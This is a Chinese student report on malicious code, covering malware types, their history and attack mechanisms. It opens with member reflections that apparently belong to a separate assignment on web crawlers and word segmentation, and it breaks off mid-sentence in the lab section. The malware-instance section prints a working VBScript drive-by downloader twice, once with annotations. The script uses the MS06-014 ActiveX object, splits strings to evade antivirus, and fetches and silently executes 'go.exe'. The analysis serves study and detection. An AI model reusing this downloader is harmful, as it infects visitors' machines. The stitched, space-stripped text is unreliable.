體會在這次網(wǎng)工大作業(yè)的完成過程中,本小組共5個人,每個人都付出很多。陳香主要負責網(wǎng)絡爬蟲部分的資料查詢及篩選的工作(占總工作量的20%)。陳香的體會是:要做好一篇稍微有看點的論文,自己所積累的知識畢竟只是毛皮,而學會多參考別人的研究成果又是另一種有效的學習方法。學會從學校圖書館這個龐大的資源庫中收集資料,以前只會百度,谷歌……但這只是基本的得到資料的途徑,然而,學會從圖書館里借書,查找……是一件非常高效的方法,相信在以后的學習過程中,這會給我?guī)砗艽蟮膸椭?。我了解到了互?lián)網(wǎng)的搜索技術原來還挺多,就搜索引擎技術,就很深奧!蔣碩主要負責中文分詞搜索技術的資料查找和整理的工作。(占總工作量的20%)。蔣碩的體會是:我開始只是上網(wǎng)查找最初的資料,但并不是很全面,有的也不夠權威。后來是從圖書館借的書中了解更詳細更權威的知識,最后進行整理。通過這次論文的完成過程,我學會了如何更好的自學一門新知識,在搜集資料,查閱資料,整理資料方面有了很大提高。同時也更加了解了一篇合格的論文的樣式及格式,對以后的幫助很大。李歡歡主要負責查找和整理有關中文分詞的一些資料,并且在理解的基礎上進行了歸納和總結。(占總工作量的20%)。李歡歡的體會是:通過做這個作業(yè),使我對于搜索引擎有了更深刻的理解。之前只是知道一味的在google或百度的搜索欄里輸入關鍵詞,現(xiàn)在知道了這些詞語或句子是怎樣被分割成一個個的小關鍵詞,是根據(jù)或者按照什么規(guī)則來分的。對于中文分詞的不同算法我也有了一些了解。包括它們的工作原理和分詞方法。不同的分詞方法有不同的優(yōu)缺點,不管是在分詞速度上還是在分詞準確性上都有著一些區(qū)別。知道了這些,我想對于我以后都會有很大的幫助,因為我知道了它的分詞方法,這樣在輸入關鍵詞的時候,就會注意一下,這樣搜索出來的結果就會與我期望的更接近。這些都是做這個作業(yè)給我?guī)淼暮锰?,并且我也在此過程中知道了如何整理和歸納資料,如何學習一些新的知識??傊鞘芤娣藴\。李艷蕊主要負責爬蟲的搜索策略和中文分詞的幾種算法的比較,并且在理解的基礎上列舉相關例子。(占總工作量的20%)。李艷蕊的體會是:這次論文的完成是由我們組里5個人的辛勤勞動一起完成的?;蛟S在學術上沒有什么成果,但是也讓我受益匪淺。寫論文不是要所有的東西都是自己寫的,那樣的話,只是自己一個人說也沒有什么意義。而是要在前人的基礎上寫出自己的東西才是最可貴的。做論文不能隨意的就從網(wǎng)上找文章,百度谷歌一起搜,這樣是找不到什么特別的權威的文章。我這次也是從學校圖書館的電子資源以及紙質(zhì)圖書上獲取了大量的知識才開始籌備我要寫的東西。在這次作業(yè)中,我感受到了團隊的力量,感謝各位同組的同學,感謝論文前徐老師給予的幫助!隗和雪主要負責負責分配任務,整體把握全組,并且查找,篩選資料,文檔最終的檢查整理等工作。(占總工作量的20%)。隗和雪的體會是:我看到題目完全第一反應是沒有頭緒,經(jīng)過老師的指點之后,我組織小組開會決定主要研究爬蟲和中文分詞兩個方面,并且立即分配了任務。我們除了利用互聯(lián)網(wǎng)的搜索引擎查找資料,還利用圖書館的圖書,和期刊網(wǎng)等資料庫,使我們在查找資料方面的技能得到了提高。從一點都不了解到知道爬蟲和搜索引擎的的概念,再到了解到其中背后的理論和代碼,在這過程中使知識很深刻的印在了大腦中。完全起到本課程考察的效果。惡意代碼分析目錄摘要: 3關鍵詞: 31.概要介紹 32.惡意代碼綜述 42.1惡意代碼的特征 42.2惡意代碼的傳播 42.2.1惡意代碼的傳播手法 42.2.2惡意代碼的趨勢 42.3惡意代碼的類型 52.4惡意代碼的發(fā)展 82.5惡意代碼攻擊機制 113.惡意代碼實例 124.惡意代碼分析實驗操作 145.惡意代碼偵測 195.1現(xiàn)行惡意代碼偵測情況 195.2應有惡意代碼偵測機制 215.2.1惡意代碼傳播的不易控性 215.2.2路徑跟蹤的新方法:沾染圖 225.2.3沾染圖的基礎 245.2.4Panorama 266.小組感想 297.小組分工 318.參考文獻 32
摘要:惡意代碼(MaliciousCode)是指沒有作用卻會帶來危險的代碼,其最主要特征是目的的惡意性、程序的執(zhí)行性與執(zhí)行的傳播性。在探索了惡意代碼的基本屬性與特征后,我組進而對一個真實的惡意代碼實例進行了較為詳細的分為,并在真實代碼旁均作了詳實的批注。除此,為了進一步跟蹤惡意代碼的破壞途徑,我組在我們的筆記本電腦中裝入了VWare虛擬機,并試圖運行TEMU軟件,進行此方面研究。最后,在完成上述工作后,我們產(chǎn)生了這樣的觀點,即:僅僅了解惡意代碼的實質(zhì)與惡性并不足以產(chǎn)生對現(xiàn)實生活有益的效果,為了能學有所用,我們更應了解的是如何對惡意代碼進行偵測和防治。因而,我組最后的研究內(nèi)容是與探索一條偵測途徑,即:Panorama系統(tǒng),以遍更有效地抵消惡意代碼的進攻。關鍵詞:惡意代碼(惡意軟件),TEMU,惡意代碼偵測,Panorama
概要介紹生活質(zhì)量的提高、信息的海量增加、科技的日益普及等無一不使電腦的泛化與網(wǎng)絡的興榮呈現(xiàn)愈演愈烈的趨勢。隨著這種趨勢的日益明顯,人們愈發(fā)地離不開電腦的應用與網(wǎng)絡所呈現(xiàn)出的便利與快捷。然而,不可忽視的是,這種繁華背后的另一面卻也有著令人膽寒的發(fā)展。惡意代碼,無疑是這種現(xiàn)象最不可替代的承擔者。它們竊取私人用戶信息、嚴重破壞網(wǎng)絡秩序、使得數(shù)以萬計的資產(chǎn)流失等等。特洛伊木馬、蠕蟲病毒、鍵盤記錄器、密碼竊賊、網(wǎng)絡嗅探器、隱形后門、間諜軟件等,數(shù)不勝數(shù)的計算機病毒、惡意代碼、惡意軟件等,每天都在窺探著人們的生活,伺機下手以進行破壞行為。為此,我組于是決定進行惡意代碼方面的探究,以求更好地理解其本質(zhì)、屬性等一些基本信息,為的是對于其防御措施亦能被提高。鑒于此,我組進行的第一項內(nèi)容即是對惡意代碼進行了概要性學習,主要包括了其概述、類型、發(fā)展與進攻機制等四方面內(nèi)容。接下來,本著學以致用的原則,我們詳細分析了一個惡意代碼實例,一是用以驗證之前學習內(nèi)容的正確性,二則是切實展示出其之所以“惡意”的原因。所謂“知己知彼,百戰(zhàn)不殆”,正確理解其進攻機制,觀測出其惡性成分,才能切實明了最為有效的偵測的途徑。在學習完惡意代碼的基本屬性與惡意代碼實例后,我組想進行更深一步的實驗,即利用虛擬機中的軟件進行惡意代碼的跟蹤,以求得其進攻途徑。于是,我們在自己的電腦中安裝了VWareWorkstation7作為試驗用虛擬機,并在虛擬機中安裝了Ubuntu9.04版本作為虛擬機中的操作系統(tǒng)。后,在虛擬機中安裝了QEMU以為安裝最終的實驗工具TEMU做準備。然而,在安裝TEMU時,我組遇到了一個比較大的困難,并最終導致本部分探究內(nèi)容并不是非常完美。具體內(nèi)容,我們會在之后的相應內(nèi)容(本篇第4部分)進行詳細說明。正如我組一開始便提出的觀點,進行惡意代碼本省的學習并不是我們的目的,因為至少我組成員沒有想在今后進行破壞性事業(yè)的打算,因而,所有的學習內(nèi)容均本著學以致用的態(tài)度,即:如何進行偵測與預防。因而,在本次學習的最后階段,我們探究了一個概念系統(tǒng)Panorama,并與之前(即現(xiàn)大多數(shù)應用的)偵測系統(tǒng)進行了比對,來說明最為切實有效的偵測理應來源于對于底層、對于終端、對于沾染路徑的多方位立體偵測途徑。綜上所述,我組本篇文檔的主要思路如下:第一部分:概要描述;第二部分:惡意代碼概述;第三部分:惡意代碼實例與分析;第四部分:惡意代碼分析實驗操作;第五部分:惡意代碼偵測;第六部分:組內(nèi)成員感想;第七部分:組內(nèi)分工;第八部分:參考文獻。惡意代碼綜述代碼,指計算機程序代碼,可以被執(zhí)行完成特定功能。任何事物都有正反兩面,人類發(fā)明的所有工具既可造福也可作孽,這完全取決于使用工具的人。惡意代碼(MaliciousCode)是指沒有作用卻會帶來危險的代碼,一個最安全的定義是把所有不必要的代碼都看作是惡意的,不必要代碼比惡意代碼具有更寬泛的含義,包括所有可能與某個組織安全策略相沖突的軟件。計算機程序也不例外,軟件工程師們編寫了大量的有用的軟件(操作系統(tǒng),應用系統(tǒng)和數(shù)據(jù)庫系統(tǒng)等)的同時,黑客們在編寫編寫擾亂社會和他人的計算機程序,這些代碼統(tǒng)稱為惡意代碼。2.1惡意代碼的特征惡意代碼(Maliciouscode)或者,惡意軟件(Malware,MaliciousSoftware)具有如下共同特征:(1)惡意的目的(2)本身是程序(3)通過執(zhí)行發(fā)生作用有些惡作劇程序或者游戲程序不能看作是惡意代碼。對濾過性病毒的特征進行討論的文獻很多,盡管它們數(shù)量很多,但是機理比較近似,在防病毒程序的防護范圍之內(nèi),更值得注意的是非濾過性病毒。2.2惡意代碼的傳播2.2.1惡意代碼的傳播手法惡意代碼編寫者一般利用三類手段來傳播惡意代碼:軟件漏洞、用戶本身或者兩者的混合。有些惡意代碼是自啟動的蠕蟲和嵌入腳本,本身就是軟件,這類惡意代碼對人的活動沒有要求。一些像特洛伊木馬、電子郵件蠕蟲等惡意代碼,利用受害者的心理操縱他們執(zhí)行不安全的代碼;還有一些是哄騙用戶關閉保護措施來安裝惡意代碼。2.2.2惡意代碼的趨勢種類更模糊惡意代碼的傳播不單純依賴軟件漏洞或者社會工程中的某一種,而可能是它們的混合。比如蠕蟲產(chǎn)生寄生的文件病毒,特洛伊程序,口令竊取程序,后門程序,進一步模糊了蠕蟲、病毒和特洛伊的區(qū)別?;旌蟼鞑ツJ健盎旌喜《就{”和“收斂威脅”的成為新的病毒術語,“紅色代碼”利用的是IIS的漏洞,Nimda實際上是1988年出現(xiàn)的Morris蠕蟲的派生品種,它們的特點都是利用漏洞,病毒的模式從引導區(qū)方式發(fā)展為多種類病毒蠕蟲方式,所需要的時間并不是很長。多平臺多平臺攻擊開始出現(xiàn),有些惡意代碼對不兼容的平臺都能夠有作用。來自Windows的蠕蟲可以利用Apache的漏洞,而Linux蠕蟲會派生exe格式的特洛伊。使用銷售技術另外一個趨勢是更多的惡意代碼使用銷售技術,其目的不僅在于利用受害者的郵箱實現(xiàn)最大數(shù)量的轉(zhuǎn)發(fā),更重要的是引起受害者的興趣,讓受害者進一步對惡意文件進行操作,并且使用網(wǎng)絡探測、電子郵件腳本嵌入和其它不使用附件的技術來達到自己的目的。惡意軟件(malware)的制造者可能會將一些有名的攻擊方法與新的漏洞結合起來,制造出下一代的WM/Concept,下一代的CodeRed,下一代的Nimda。對于防病毒軟件的制造者,改變自己的方法去對付新的威脅則需要不少的時間。程度加深這似乎是一個不爭的事實。然而想要從根本上了解這個特點的實質(zhì),我們還需要從兩個方面理解:惡意程度,發(fā)展速度。在2.4節(jié)中的圖2-2,我們會詳細給出說明。2.3惡意代碼的類型我們從圖2-1中可以很清楚地看到,計算機惡意代碼,包括病毒、木馬程序等,可謂千差萬別,千變?nèi)f化。我們之所以要學習此部分內(nèi)容,目的是進行有針對的偵測與預防,因為,每一種惡意代碼其進攻機制不盡相同(我們會在下一部分詳細說明),大致分類如下圖:圖2-1惡意代碼大致分類具體分類與其所對應特點可見如下幾部分:(1)計算機病毒定義:指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數(shù)據(jù),影響計算機使用,并能自我復制的一組計算機指令或者程序代碼。而在一般教科書及通用資料中被定義為:利用計算機軟件與硬件的缺陷,由被感染機內(nèi)部發(fā)出的破壞計算機數(shù)據(jù)并影響計算機正常工作的一組指令集或程序代碼。特點:寄生、潛伏、隱蔽、可觸發(fā)、傳染和破壞。(2)計算機蠕蟲定義:指通過計算機網(wǎng)絡自我復制,消耗系統(tǒng)資源和網(wǎng)絡資源的程序。計算機蠕蟲是一種軟件程序,可以將自身從一臺計算機復制到另一臺,同時并不需要人的干預。與計算機病毒不同,蠕蟲可以自動復制自己。特點:掃描、攻擊和擴散。(3)特洛伊木馬定義:指一種與遠程計算機建立連接,使遠程計算機能夠通過網(wǎng)絡控制本地計算機的程序。一種秘密潛伏的能夠通過遠程網(wǎng)絡進行控制的惡意程序??刂普呖梢钥刂票幻孛苤踩肽抉R的計算機的一切動作和資源,是惡意攻擊者進行竊取信息等的工具。特點:欺騙、隱蔽、自動運行、自動恢復和信息竊取。不產(chǎn)生圖標木馬雖然在你系統(tǒng)啟動時會自動運行,但它不會在"任務欄"中產(chǎn)生一個圖標,木馬程序自動在任務管理器中隱藏,并以"系統(tǒng)服務"的方式欺騙操作系統(tǒng)。(4)邏輯炸彈定義:指一段嵌入計算機系統(tǒng)程序的,通過特殊的數(shù)據(jù)或時間作為條件觸發(fā),試圖完成一定破壞功能的程序。計算機中的“邏輯炸彈”是指在特定邏輯條件滿足時,實施破壞的計算機程序,該程序觸發(fā)后造成計算機數(shù)據(jù)丟失、計算機不能從硬盤或者軟盤引導,甚至會使整個系統(tǒng)癱瘓,并出現(xiàn)物理損壞的虛假現(xiàn)象。特點:計算機中的“邏輯炸彈”是指在特定邏輯條件滿足時,實施破壞的計算機程序,該程序觸發(fā)后造成計算機數(shù)據(jù)丟失、計算機不能從硬盤或者軟盤引導,甚至會使整個系統(tǒng)癱瘓,并出現(xiàn)物理損壞的虛假現(xiàn)象。因為一個邏輯炸彈不自我復制,這是很容易寫一邏輯炸彈的計劃。這也意味著一個邏輯炸彈將不會蔓延到意想不到的受害者。在某些方面,邏輯炸彈是最文明的程序的威脅,因為一個邏輯炸彈,必須針對特定的受害者。經(jīng)典使用一個邏輯炸彈,是要確保支付軟件。如果付款是不是由某一特定日期,邏輯炸彈激活和軟件會自動刪除本身。一個更惡意的形式,即邏輯炸彈也將刪除系統(tǒng)上其他數(shù)據(jù)。(5)病菌定義:指不依賴于系統(tǒng)軟件,能夠自我復制和傳播,以消耗系統(tǒng)資源為目的的程序。特點:傳染和拒絕服務。(6)用戶級RootKit定義:指通過替代或者修改被系統(tǒng)管理員或普通用戶執(zhí)行的程序進入系統(tǒng),從而實現(xiàn)隱藏和創(chuàng)建后門的程序。Rootkit是一種奇特的程序,它具有隱身功能:無論靜止時(作為文件存在),還是活動時,(作為進程存在),都不會被察覺。特點:Rootkit是一種特殊類型的malware(惡意軟件)。Rootkit之所以特殊是因為您不知道它們在做什么事情。Rootkit基本上是無法檢測到的,而且?guī)缀醪豢赡軇h除它們。雖然檢測工具在不斷增多,但是惡意軟件的開發(fā)者也在不斷尋找新的途徑來掩蓋他們的蹤跡。在發(fā)現(xiàn)系統(tǒng)中存在Rootkit之后,能夠采取的補救措施也較為有限。由于Rootkit可以將自身隱藏起來,所以您可能無法知道它們已經(jīng)在系統(tǒng)中存在了多長的時間。而且您也不知道Rootkit已經(jīng)對哪些信息造成了損害。對于找出的Rootkit,最好的應對方法便是擦除并重新安裝系統(tǒng)。雖然這種手段很嚴厲,但是這是得到證明的唯一可以徹底刪除Rootkit的方法。(7)核心級RootKit定義:指嵌入操作系統(tǒng)內(nèi)核進行隱藏和創(chuàng)建后門的程序。Rootkit的目的在于隱藏自己以及其他軟件不被發(fā)現(xiàn)。它可以通過阻止用戶識別和刪除攻擊者的軟件來達到這個目的。Rootkit幾乎可以隱藏任何軟件,包括文件服務器、鍵盤記錄器、Botnet和Remailer。許多Rootkit甚至可以隱藏大型的文件集合并允許攻擊者在您的計算機上保存許多文件,而您無法看到這些文件。特點:隱蔽,潛伏。以上內(nèi)容,我組進行了總結,為了方便閱讀,我組將其其結果概括成了如下的表格:惡意代碼類型定義特點計算機病毒指編制或者在計算機程序中插入的破壞計算機功能或者毀壞數(shù)據(jù),影響計算機使用,并能自我復制的一組計算機指令或者程序代碼。潛伏、傳染和破壞計算機蠕蟲指通過計算機網(wǎng)絡自我復制,消耗系統(tǒng)資源和網(wǎng)絡資源的程序掃描、攻擊和擴散特洛伊木馬指一種與遠程計算機建立連接,使遠程計算機能夠通過網(wǎng)絡控制本地計算機的程序。欺騙、隱蔽和信息竊取邏輯炸彈指一段嵌入計算機系統(tǒng)程序的,通過特殊的數(shù)據(jù)或時間作為條件觸發(fā),試圖完成一定破壞功能的程序。潛伏和破壞病菌指不依賴于系統(tǒng)軟件,能夠自我復制和傳播,以消耗系統(tǒng)資源為目的的程序。傳染和拒絕服務用戶級RootKit指通過替代或者修改被系統(tǒng)管理員或普通用戶執(zhí)行的程序進入系統(tǒng),從而實現(xiàn)隱藏和創(chuàng)建后門的程序。隱蔽,潛伏核心級RootKit指嵌入操作系統(tǒng)內(nèi)核進行隱藏和創(chuàng)建后門的程序隱蔽,潛伏表2-1惡意代碼分類特性2.4惡意代碼的發(fā)展惡意代碼經(jīng)過20多年的發(fā)展,破壞性、種類和感染性都得到增強。隨著計算機的網(wǎng)絡化程度逐步提高,網(wǎng)絡傳播的惡意代碼對人們?nèi)粘I钣绊懺絹碓酱蟆?1)1988年11月泛濫的Morris蠕蟲,頃刻之間使得6000多臺計算機(占當時Internet上計算機總數(shù)的10%多)癱瘓,造成嚴重的后果,并因此引起世界范圍內(nèi)關注。(2)1998年CIH病毒造成數(shù)十萬臺計算機受到破壞。1999年Happy99、Melissa病毒大爆發(fā),Melissa病毒通過E-mail附件快速傳播而使E-mail服務器和網(wǎng)絡負載過重,它還將敏感的文檔在用戶不知情的情況下按地址簿中的地址發(fā)出。(3)2000年5月爆發(fā)的“愛蟲”病毒及其以后出現(xiàn)的50多個變種病毒,是近年來讓計算機信息界付出極大代價的病毒,僅一年時間共感染了4000多萬臺計算機,造成大約87億美元的經(jīng)濟損失。(4)2001年,國信安辦與公安部共同主辦了我國首次計算機病毒疫情網(wǎng)上調(diào)查工作。結果感染過計算機病毒的用戶高達73%,其中,感染三次以上的用戶又占59%多,網(wǎng)絡安全存在大量隱患。(5)2001年8月,“紅色代碼”蠕蟲利用微軟Web服務器IIS4.0或5.0中Index服務的安全漏洞,攻破目標機器,并通過自動掃描方式傳播蠕蟲,在互聯(lián)網(wǎng)上大規(guī)模泛濫。(6)2003年,SLammer蠕蟲在10分鐘內(nèi)導致互聯(lián)網(wǎng)90%脆弱主機受到感染。同年8月,“沖擊波”蠕蟲爆發(fā),8天內(nèi)導致全球電腦用戶損失高達20億美元之多。(7)2004年到2006年,振蕩波蠕蟲、愛情后門、波特后門等惡意代碼利用電子郵件和系統(tǒng)漏洞對網(wǎng)絡主機進行瘋狂傳播,給國家和社會造成了巨大的經(jīng)濟損失。(8)目前,惡意代碼問題成為信息安全需要解決的,迫在眉睫的、刻不容緩的安全問題。圖2-2惡意代碼發(fā)展趨勢上圖可以很清晰地表明,從第一例計算機病毒(APPLEII,1981年)到2003年的沖擊波病毒,惡意程度增加之迅猛,種類數(shù)量程度增加之快速,令人瞠目。從而,我們也可以很清晰地回答2.2.2節(jié)最后遺留下來的問題。為了更好的理解上圖,并對上圖進行補充(此圖只截止到2003年產(chǎn)生的病毒),我們查閱了相關資料并進行了整理,現(xiàn)將結果公示如下:(1).ElkCloner(1982年)它被看作攻擊個人計算機的第一款全球病毒,也是所有令人頭痛的安全問題先驅(qū)者。它通過蘋果AppleII軟盤進行傳播。這個病毒被放在一個游戲磁盤上,可以被使用49次。在第50次使用的時候,它并不運行游戲,取而代之的是打開一個空白屏幕,并顯示一首短詩。(2).Brain(1986年)Brain是第一款攻擊運行微軟的受歡迎的操作系統(tǒng)DOS的病毒,可以感染感染360K軟盤的病毒,該病毒會填充滿軟盤上未用的空間,而導致它不能再被使用。(3).Morris(1988年)Morris該病毒程序利用了系統(tǒng)存在的弱點進行入侵,Morris設計的最初的目的并不是搞破壞,而是用來測量網(wǎng)絡的大小。但是,由于程序的循環(huán)沒有處理好,計算機會不停地執(zhí)行、復制Morris,最終導致死機。(4).CIH(1998年)CIH病毒是迄今為止破壞性最嚴重的病毒,也是世界上首例破壞硬件的病毒。它發(fā)作時不僅破壞硬盤的引導區(qū)和分區(qū)表,而且破壞計算機系統(tǒng)BIOS,導致主板損壞。此病毒是由臺灣大學生陳盈豪研制的,據(jù)說他研制此病毒的目的是紀念1986年的災難或是讓反病毒軟件難堪。(5).Melissa(1999年)Melissa是最早通過電子郵件傳播的病毒之一,當用戶打開一封電子郵件的附件,病毒會自動發(fā)送到用戶通訊簿中的前50個地址,因此這個病毒在數(shù)小時之內(nèi)傳遍全球。(6).Lovebug(2000年)Lovebug也通過電子郵件附近傳播,它利用了人類的本性,把自己偽裝成一封求愛信來欺騙收件人打開。這個病毒以其傳播速度和范圍讓安全專家吃驚。在數(shù)小時之內(nèi),這個小小的計算機程序征服了全世界范圍之內(nèi)的計算機系統(tǒng)。(7).“紅色代碼”(2001年)被認為是史上最昂貴的計算機病毒之一,這個自我復制的惡意代碼“紅色代碼”利用了微軟IIS服務器中的一個漏洞。該蠕蟲病毒具有一個更惡毒的版本,被稱作紅色代碼II。這兩個病毒都除了可以對網(wǎng)站進行修改外,被感染的系統(tǒng)性能還會嚴重下降。(8).“Nimda”(2001年)尼姆達(Nimda)是歷史上傳播速度最快的病毒之一,在上線之后的22分鐘之后就成為傳播最廣的病毒。(9).“沖擊波”(2003年)沖擊波病毒的英文名稱是Blaster,還被叫做Lovsan或Lovesan,它利用了微軟軟件中的一個缺陷,對系統(tǒng)端口進行瘋狂攻擊,可以導致系統(tǒng)崩潰。(10).“震蕩波”(2004年)震蕩波是又一個利用Windows缺陷的蠕蟲病毒,震蕩波可以導致計算機崩潰并不斷重啟。(11).“熊貓燒香”(2007年)熊貓燒香會使所有程序圖標變成熊貓燒香,并使它們不能應用。(12).“掃蕩波”(2008年)同沖擊波和震蕩波一樣,也是個利用漏洞從網(wǎng)絡入侵的程序。而且正好在黑屏事件,大批用戶關閉自動更新以后,這更加劇了這個病毒的蔓延。這個病毒可以導致被攻擊者的機器被完全控制。(13).“Conficker”(2008年)Conficker.C病毒原來要在2009年3月進行大量傳播,然后在4月1日實施全球性攻擊,引起全球性災難。不過,這種病毒實際上沒有造成什么破壞。(14).“木馬下載器”(2009年)本年度的新病毒,中毒后會產(chǎn)生1000~2000不等的木馬病毒,導致系統(tǒng)崩潰,短短3天變成360安全衛(wèi)士首殺榜前3名(現(xiàn)在位居榜首)(15).“鬼影病毒”(2010年)該病毒成功運行后,在進程中、系統(tǒng)啟動加載項里找不到任何異常,同時即使格式化重裝系統(tǒng),也無法將徹底清除該病毒。猶如“鬼影”一般“陰魂不散”,所以稱為“鬼影”病毒。(16)..“極虎病毒”(2010年)該病毒類似qvod播放器的圖標。感染極虎之后可能會遭遇的情況:計算機進程中莫名其妙的有ping.exe和rar.exe進程,并且cpu占用很高,風扇轉(zhuǎn)的很響很頻繁(手提電腦),并且這兩個進程無法結束。某些文件會出現(xiàn)usp10.dll、lpk.dll文件,殺毒軟件和安全類軟件會被自動關閉,如瑞星、360安全衛(wèi)士等如果沒有及時升級到最新版本都有可能被停掉。破壞殺毒軟件,系統(tǒng)文件,感染系統(tǒng)文件,讓殺毒軟件無從下手。極虎病毒最大的危害是造成系統(tǒng)文件被篡改,無法使用殺毒軟件進行清理,一旦清理,系統(tǒng)將無法打開和正常運行,同時基于計算機和網(wǎng)絡的帳戶信息可能會被盜,如網(wǎng)絡游戲帳戶、銀行帳戶、支付帳戶以及重要的電子郵件帳戶等。2.5惡意代碼攻擊機制惡意代碼的行為表現(xiàn)各異,破壞程度千差萬別,但基本作用機制大體相同,其整個作用過程分為6個部分:(1)侵入系統(tǒng)。侵入系統(tǒng)是惡意代碼實現(xiàn)其惡意目的的必要條件。惡意代碼入侵的途徑很多,如:從互聯(lián)網(wǎng)下載的程序本身就可能含有惡意代碼;接收已經(jīng)感染惡意代碼的電子郵件;從光盤或軟盤往系統(tǒng)上安裝軟件;黑客或者攻擊者故意將惡意代碼植入系統(tǒng)等。(2)維持或提升現(xiàn)有特權。惡意代碼的傳播與破壞必須盜用用戶或者進程的合法權限才能完成。(3)隱蔽策略。為了不讓系統(tǒng)發(fā)現(xiàn)惡意代碼已經(jīng)侵入系統(tǒng),惡意代碼可能會改名、刪除源文件或者修改系統(tǒng)的安全策略來隱藏自己。(4)潛伏。惡意代碼侵入系統(tǒng)后,等待一定的條件,并具有足夠的權限時,就發(fā)作并進行破壞活動。(5)破壞。惡意代碼的本質(zhì)具有破壞性,其目的是造成信息丟失、泄密,破壞系統(tǒng)完整性等。(6)重復(1)至(5)對新的目標實施攻擊過程。惡意代碼的攻擊模型如圖2-1所示。圖2-3惡意代碼進攻機制惡意代碼實例在我組展示我們所學習的真實惡意代碼前,我們認為有必要先了解一下木馬病毒的發(fā)展,畢竟,在了解一個真實的木馬程序之前了解其背景總會有些好處。第一代木馬:偽裝型木馬這種木馬通過偽裝成一個合法性程序誘騙用戶上當。世界上第一個計算機木馬是出現(xiàn)在1986年的PC-Write木馬。它偽裝成共享軟件PC-Write的2.72版本(事實上,編寫PC-Write的Quicksoft公司從未發(fā)行過2.72版本),一旦用戶信以為真運行該木馬程序,那么他的下場就是硬盤被格式化。在我剛剛上大學的時候,曾聽說我校一個前輩牛人在WAX機房上用BASIC作了一個登錄界面木馬程序,當你把你的用戶ID,密碼輸入一個和正常的登錄界面一模一樣的偽登錄界面后后,木馬程序一面保存你的ID,和密碼,一面提示你密碼錯誤讓你重新輸入,當你第二次登錄時,你已成了木馬的犧牲品。此時的第一代木馬還不具備傳染特征。第二代木馬:AIDS型木馬繼PC-Write之后,1989年出現(xiàn)了AIDS木馬。由于當時很少有人使用電子郵件,所以AIDS的作者就利用現(xiàn)實生活中的郵件進行散播:給其他人寄去一封封含有木馬程序軟盤的郵件。之所以叫這個名稱是因為軟盤中包含有AIDS和HIV疾病的藥品,價格,預防措施等相關信息。軟盤中的木馬程序在運行后,雖然不會破壞數(shù)據(jù),但是他將硬盤加密鎖死,然后提示受感染用戶花錢消災??梢哉f第二代木馬已具備了傳播特征(盡管通過傳統(tǒng)的郵遞方式)。第三代木馬:網(wǎng)絡傳播性木馬隨著Internet的普及,這一代木馬兼?zhèn)鋫窝b和傳播兩種特征并結合TCP/IP網(wǎng)絡技術四處泛濫。同時他還有新的特征:第一,添加了“后門”功能。所謂后門就是一種可以為計算機系統(tǒng)秘密開啟訪問入口的程序。一旦被安裝,這些程序就能夠使攻擊者繞過安全程序進入系統(tǒng)。該功能的目的就是收集系統(tǒng)中的重要信息,例如,財務報告、口令及信用卡號。此外,攻擊者還可以利用后門控制系統(tǒng),使之成為攻擊其它計算機的幫兇。由于后門是隱藏在系統(tǒng)背后運行的,因此很難被檢測到。它們不像病毒和蠕蟲那樣通過消耗內(nèi)存而引起注意。第二,添加了鍵盤記錄功能。從名稱上就可以知道,該功能主要是記錄用戶所有的鍵盤內(nèi)容然后形成鍵盤記錄的日志文件發(fā)送給惡意用戶。惡意用戶可以從中找到用戶名、口令以及信用卡號等用戶信息。這一代木馬比較有名的有國外的BO2000(BackOrifice)和國內(nèi)的冰河木馬。它們有如下共同特點:基于網(wǎng)絡的客戶端/服務器應用程序。具有搜集信息、執(zhí)行系統(tǒng)命令、重新設置機器、重新定向等功能。當木馬程序攻擊得手后,計算機就完全在黑客控制的傀儡主機,黑客成了超級用戶,用戶的所有計算機操作不但沒有任何秘密而言,而且黑客可以遠程控制傀儡主機對別的主機發(fā)動攻擊,這時候背俘獲的傀儡主機成了黑客進行進一步攻擊的擋箭牌和跳板。下面的,則是一個真實的木馬程序,此程序為VBScript所寫,具體如下:onerrorresumenextdl="/go.exe"Setdf=document.createElement("object")df.setAttribute"classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"str="Microsoft.XMLHTTP"Setx=df.CreateObject(str,"")a1="Ado"a2="db."a3="Str"a4="eam"str1=a1&a2&a3&a4str5=str1setS=df.createobject(str5,"")S.type=1str6="GET"x.Openstr6,dl,Falsex.Sendfname1=""setF=df.createobject("Scripting.FileSystemObject","")settmp=F.GetSpecialFolder(2)fname1=F.BuildPath(tmp,fname1)S.openS.writex.responseBodyS.savetofilefname1,2S.closesetQ=df.createobject("Shell.Application","")Q.ShellExecutefname1,"","","open",0表3-1惡意代碼實例初看此代碼,的確有些不明就里,不過,在分析過后,我們發(fā)下了一些重要的結論,現(xiàn)將分析結果展示如下:onerrorresumenext'開啟錯誤陷阱dl=/go.exe'定義“dl”為木馬下載地址Setdf=document.createElement("object")'建立子元素df.setAttribute"classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"'聲明網(wǎng)馬的clsid,這個是ms06014的str="Microsoft.XMLHTTP"'使用XMLhttp對象Setx=df.CreateObject(str,"")'用Adodb.Stream執(zhí)行文件操作a1="Ado"'下面這三個的作用是拆分字符串'“Adodb.Stream”,躲過一些殺毒軟件查殺a2="db."a3="Str"a4="eam"str1=a1&a2&a3&a4'合并字符串“Adodb.Stream”str5=str1'轉(zhuǎn)移變量str1到str5setS=df.createobject(str5,"")'執(zhí)行文件操作S.type=1str6="GET"'使用get方式獲取木馬文件x.Openstr6,dl,False'根據(jù)木馬地址獲取木馬文件x.Sendfname1=""'定義木馬的文件名""setF=df.createobject("Scripting.FileSystemObject","")'用FileSystemObjec執(zhí)行文件操作,這'次是寫入文件settmp=F.GetSpecialFolder(2)'獲取臨時文件夾路徑fname1=F.BuildPath(tmp,fname1)'下面這些是向臨時文件夾中寫入木馬S.openS.writex.responseBodyS.savetofilefname1,2'保存木馬文件S.close'關閉連接setQ=df.createobject("Shell.Application","")'用Shell.Application運行木馬文件Q.ShellExecutefname1,"","","open",0'以隱藏方式運行木馬表3-2惡意代碼實例分析關鍵的信息我組已經(jīng)用藍色標記。從上表的分析來看,可以發(fā)現(xiàn)一個根本,即“隱藏”,所有的途徑均要隱藏或隱蔽。如將自身的名字拆分、用Shell.Application方式運行等??梢姡伺c表2-1中所列是不謀而合的。面對如此狡詐的程序代碼,我們當然欲探究其攻擊途徑與方式,因而,這也催生出我們想要跟蹤它的欲望。于是,我們進行了下面的實驗內(nèi)容。4.惡意代碼分析實驗操作在本部分中,我組欲跟蹤惡意代碼的路徑,說明其機制。所以,在我組的筆記本電腦上安裝了VWareWorkstation7虛擬機。給此虛擬機配置的操作系統(tǒng)是Ubuntu9.0